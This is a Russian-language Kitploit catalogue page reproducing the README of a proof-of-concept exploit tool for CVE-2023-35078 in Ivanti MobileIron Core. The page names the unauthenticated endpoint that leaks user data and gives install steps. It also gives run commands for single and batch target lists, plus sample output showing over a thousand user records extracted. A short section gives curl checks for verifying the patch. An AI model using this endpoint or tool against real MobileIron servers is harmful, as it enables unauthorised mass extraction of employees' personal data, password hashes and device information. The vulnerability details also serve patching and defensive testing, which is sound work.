Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/0nsec/cve-2023-35078
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - инструмент эксплуатации удалённого неаутентифицированного доступа к API Ivanti MobileIron Core

Репозиторий
10 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
CVE-2023-35078 — CVE-2023-35078 - инструмент эксплуатации удалённого неаутентифицированного доступа к API Ivanti MobileIron Core | Kitploit

Инструмент эксплойта CVE-2023-35078

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core Remote Unauthenticated API Access

Python Version License CVSS Last Updated

Эксплойт Proof-of-Concept на Python для CVE-2023-35078, нацеленный на уязвимость удалённого неаутентифицированного доступа к API в системах Ivanti MobileIron Core.

Обзор уязвимости

CVE-2023-35078 — критическая уязвимость, затрагивающая Ivanti MobileIron Core, которая позволяет удалённым неаутентифицированным злоумышленникам получать доступ к чувствительным API-эндпоинтам и извлекать данные пользователей без какой-либо аутентификации.

  • Оценка CVSS: 9.8 (критическая)
  • CWE: CWE-306 (Отсутствие аутентификации для критической функции)
  • Затронутые продукты: Ivanti MobileIron Core
  • Уязвимые версии:
    • 11.2 (до 11.2 CU21)
    • 11.3 (до 11.3 CU18)
    • 11.4 (до 11.4 CU8)
  • Вектор атаки: Сеть
  • Аутентификация: Не требуется
  • Взаимодействие с пользователем: Не требуется
  • Воздействие: Полное раскрытие пользовательских данных

Технические детали

Уязвимость существует в механизме аутентификации API MobileIron Core, а именно в эндпоинте /mifs/aad/api/v2/authorized/users. Эндпоинт не выполняет надлежащую проверку токенов аутентификации, что позволяет несанкционированный доступ к чувствительной информации пользователей, включая:

  • Учётные данные пользователей: имена пользователей, хеши паролей
  • Личные данные: полные имена, адреса электронной почты, номера телефонов
  • Корпоративные данные: идентификаторы сотрудников, информация об отделах
  • Информация об устройствах: зарегистрированные устройства, конфигурации устройств
  • Административные данные: роли пользователей, разрешения, членство в группах

Установка

Предварительные требования

  • Python: 3.6 или выше
  • Операционная система: Linux, macOS, Windows
  • Сетевой доступ: Требуется для тестирования целей
  • Разрешения: Авторизация от владельцев систем

Быстрая установка

root@kitploit:~
# Clone the repository
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# Install dependencies
pip3 install -r requirements.txt

# Make executable (Linux/macOS)
chmod +x cve_2023_35078.py

Ручная установка

root@kitploit:~
# Create project directory
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# Download the script
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# Install required packages
pip3 install requests urllib3 termcolor argparse

Установка с помощью Docker (необязательно)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Build and run with Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

Использование

Базовое использование

root@kitploit:~
# Test single target
python3 cve_2023_35078.py -u https://mobileiron.example.com

# Test multiple targets from file
python3 cve_2023_35078.py -f targets.txt

# Verbose mode with custom output directory
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# Custom timeout and output settings
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

Примеры расширенного использования

root@kitploit:~
# Comprehensive corporate assessment
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# Single target with detailed logging
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# Batch scanning with custom timeout
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# Quick vulnerability check (no verbose output)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

Вывод

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Target: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Checking version for: https://vulnerable.mobileiron.com
[*] Detected version: 11.3
[+] Target appears VULNERABLE!
[*] Attempting to exploit: https://vulnerable.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] SUCCESS! Found 1,247 users
[+] Results saved to: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Extracted 1247 user records
[*] Sample fields: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] Scan completed!
[*] Targets processed: 1
[*] Successful exploits: 1
[!] WARNING: 1 vulnerable system(s) found!
[!] Ensure proper authorization before testing!

Подробный вывод

root@kitploit:~
[*] Checking version for: https://test.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Response length: 45,123 bytes
[*] JSON parsing successful
[*] Found user data structure with 234 records
[+] SUCCESS! Found 234 users
[*] Sample user data: {'id': '12345', 'username': '[email protected]'}
[+] Results saved to: ./results/test_mobileiron_com_20250821_055013.json

Оптимизация производительности

  • Пул соединений: повторное использование HTTP-соединений
  • Параллельные запросы: параллельная обработка нескольких целей
  • Умные таймауты: адаптивный таймаут на основе времени ответа
  • Управление памятью: эффективная обработка больших наборов данных
  • Ограничение скорости: встроенные задержки для предотвращения перегрузки целей

Информация об исправлениях от вендора

Проверка исправления

root@kitploit:~
# Check current version
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# Verify patched endpoints return 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

Ссылки и ресурсы

Официальные бюллетени безопасности

  • NVD - CVE-2023-35078
  • Бюллетень безопасности Ivanti
  • CISA: известные эксплуатируемые уязвимости

Техническая документация

  • Руководство администратора Ivanti MobileIron Core
  • Документация по API
  • Руководство по усилению безопасности

Исследовательские статьи и анализ

  • Подробный технический анализ
  • Методы эксплуатации
  • Отчёт об анализе угроз
Скачать инструмент
ВерсияУязвимаИсправление доступноУровень исправленияДата выпуска
11.2.xДаДоступноCU21+2023-07-25
11.3.xДаДоступноCU18+2023-07-25
11.4.xДаДоступноCU8+2023-07-25
11.5.x+НетН/ДН/ДН/Д